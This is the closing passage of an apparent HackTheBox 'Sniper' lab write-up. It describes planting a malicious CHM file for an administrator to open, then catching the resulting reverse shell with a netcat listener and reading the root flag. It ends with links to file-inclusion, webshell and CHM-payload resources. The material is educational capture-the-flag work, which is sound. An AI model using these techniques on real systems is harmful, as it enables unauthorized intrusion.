<p>Once we put the <code>doc.chm</code> file in <code>Docs</code> I simply setup <code>netcat</code> listener with my port i generated in malicious chm file. Now all i need to do is to wait the Administrator to checked and open it.</p>
<h2 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h2><p>After 2-3 minutes I have the administrator shell ! Very nice box !</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper via 🐘 v7<span class="number">.3</span><span class="number">.15</span> </span><br><span class="line">❯ nc -lnvp <span class="number">1234</span></span><br><span class="line">listening <span class="keyword">on</span> [any] <span class="number">1234</span> ...</span><br><span class="line">connect to [<span class="number">10.10</span><span class="number">.15</span><span class="number">.33</span>] <span class="keyword">from</span> (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.151</span>] <span class="number">49703</span></span><br><span class="line">Microsoft Windows [Version <span class="number">10.0</span><span class="number">.17763</span><span class="number">.678</span>]</span><br><span class="line">(c) <span class="number">2018</span> Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;whoami &amp; hostname</span><br><span class="line">whoami &amp; hostname</span><br><span class="line">sniper\administrator</span><br><span class="line">Sniper</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Get-the-root-txt"><a href="#Get-the-root-txt" class="headerlink" title="Get the root.txt"></a>Get the root.txt</h3><figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;cd \Users\Administrator</span><br><span class="line">cd \Users\Administrator</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator&gt;dir</span><br><span class="line">dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">6</span>A2B<span class="number">-2640</span></span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Administrator</span><br><span class="line"></span><br><span class="line"><span class="number">04</span>/<span class="number">09</span>/<span class="number">2019</span>  <span class="number">06</span>:<span class="number">47</span> AM    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">04</span>/<span class="number">09</span>/<span class="number">2019</span>  <span class="number">06</span>:<span class="number">47</span> AM    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          <span class="number">3</span>D Objects</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Contacts</span><br><span class="line"><span class="number">10</span>/<span class="number">01</span>/<span class="number">2019</span>  <span class="number">08</span>:<span class="number">44</span> AM    &lt;DIR&gt;          Desktop</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Documents</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Downloads</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Favorites</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Links</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Music</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Pictures</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Saved Games</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Searches</span><br><span class="line"><span class="number">08</span>/<span class="number">14</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">38</span> PM    &lt;DIR&gt;          Videos</span><br><span class="line">               <span class="number">0</span> File(s)              <span class="number">0</span> bytes</span><br><span class="line">              <span class="number">14</span> Dir(s)  <span class="number">17</span>,<span class="number">986</span>,<span class="number">367</span>,<span class="number">488</span> bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator&gt;cd Desktop </span><br><span class="line">cd Desktop</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;dir</span><br><span class="line">dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">6</span>A2B<span class="number">-2640</span></span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Administrator\Desktop</span><br><span class="line"></span><br><span class="line"><span class="number">10</span>/<span class="number">01</span>/<span class="number">2019</span>  <span class="number">08</span>:<span class="number">44</span> AM    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">10</span>/<span class="number">01</span>/<span class="number">2019</span>  <span class="number">08</span>:<span class="number">44</span> AM    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">08</span>:<span class="number">13</span> AM                <span class="number">32</span> root.txt</span><br><span class="line">               <span class="number">1</span> File(s)             <span class="number">32</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)  <span class="number">17</span>,<span class="number">986</span>,<span class="number">367</span>,<span class="number">488</span> bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;more root.txt</span><br><span class="line">more root.txt</span><br><span class="line"><span class="number">5624</span>c[-------------------]<span class="number">436</span>c15</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;</span><br></pre></td></tr></table></figure>

<hr>
<p>If you liked my writeup please leave a respect on my <a href="https://www.hackthebox.eu/profile/128965" target="_blank" rel="noopener">Profile</a></p>
<p><img src="https://www.hackthebox.eu/badge/image/128965" alt="Payas0" title="Payas0"></p>
<hr>
<p>Referrences:</p>
<p><a href="http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html" target="_blank" rel="noopener">LFI to RFI</a></p>
<p><a href="https://github.com/WhiteWinterWolf/wwwolf-php-webshell" target="_blank" rel="noopener">WebShell for Windows</a></p>
<p><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk" target="_blank" rel="noopener">Access Privilege Checked</a></p>
<p><a href="https://www.microsoft.com/en-us/download/details.aspx?id=21138" target="_blank" rel="noopener">HTML Workshop</a></p>
<p><a href="https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1" target="_blank" rel="noopener">Nishang - Out-CHM</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Scan-Web-page-directories"><span class="toc-number">4.1.</span> <span class="toc-text">Scan Web page directories</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Sniper-Web-Page"><span class="toc-number">4.2.</span> <span class="toc-text">Sniper Web Page</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#LFI-Local-File-Inclusion"><span class="toc-number">5.1.</span> <span class="toc-text">LFI | Local File Inclusion</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RFI-Remote-File-Inclusion"><span class="toc-number">5.2.</span> <span class="toc-text">RFI | Remote File Inclusion</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerating-SNIPER-machine"><span class="toc-number">5.3.</span> <span class="toc-text">Enumerating SNIPER machine</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation-for-user-CHRIS"><span class="toc-number">6.1.</span> <span class="toc-text">Privilege Escalation for user CHRIS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Method-1"><span class="toc-number">6.2.</span> <span class="toc-text">Method #1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Method-2"><span class="toc-number">6.3.</span> <span class="toc-text">Method #2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Note-txt"><span class="toc-number">7.1.</span> <span class="toc-text">Note.txt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CHM-File"><span class="toc-number">7.2.</span> <span class="toc-text">CHM File</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Generate-Malicious-CHM-File"><span class="toc-number">7.3.</span> <span class="toc-text">Generate Malicious CHM File</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gain-the-Administrator-Shell"><span class="toc-number">8.</span> <span class="toc-text">Gain the Administrator Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root"><span class="toc-number">9.</span> <span class="toc-text">Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-the-root-txt"><span class="toc-number">9.1.</span> <span class="toc-text">Get the root.txt</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&text=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&is_video=false&description=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Sniper 🏷️🔫&body=Check out this article: https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&name=HackTheBox - Sniper 🏷️🔫&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&t=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    InfoSec &#64; medz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
